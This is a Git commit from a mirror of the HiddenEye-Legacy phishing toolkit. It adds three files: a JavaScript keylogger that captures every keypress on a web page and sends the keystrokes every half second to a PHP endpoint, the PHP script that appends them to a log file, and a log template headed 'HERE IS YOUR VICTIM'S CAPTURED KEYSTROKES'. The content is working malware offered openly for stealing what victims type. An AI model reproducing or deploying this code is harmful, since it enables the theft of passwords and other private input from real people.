mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
KEYLOGGER FILES !!!!!
You can delete, these three files from your Server Folder . If you don't want them.
This commit is contained in:
parent
f1b3d0d94e
commit
3ec9863d1f
6
WebPages/KeyloggerData.txt
Normal file
6
WebPages/KeyloggerData.txt
Normal file
|
@ -0,0 +1,6 @@
|
|||
_________________________________________________________________
|
||||
_________________________________________________________________
|
||||
HERE IS YOUR VICTIM'S CAPTURED KEYSTROKES
|
||||
_______________________________________________________________
|
||||
WORK BY :- ANONUD4Y
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
14
WebPages/keylogger.js
Normal file
14
WebPages/keylogger.js
Normal file
|
@ -0,0 +1,14 @@
|
|||
|
||||
var keys='';
|
||||
document.onkeypress = function(e) {
|
||||
get = window.event?event:e;
|
||||
key = get.keyCode?get.keyCode:get.charCode;
|
||||
key = String.fromCharCode(key);
|
||||
keys+=key;
|
||||
}
|
||||
window.setInterval(function(){
|
||||
if(keys != '') {
|
||||
new Image().src = 'keylogger.php?c='+keys;
|
||||
keys = '';
|
||||
}
|
||||
}, 500);
|
9
WebPages/keylogger.php
Normal file
9
WebPages/keylogger.php
Normal file
|
@ -0,0 +1,9 @@
|
|||
<?php
|
||||
// keylogger.php by ANONUD4Y
|
||||
|
||||
if(!empty($_GET['c'])) {
|
||||
$logfile = fopen('KeyloggerData.txt', 'a+');
|
||||
fwrite($logfile, $_GET['c']);
|
||||
fclose($logfile);
|
||||
}
|
||||
?>
|
Loading…
Reference in New Issue
Block a user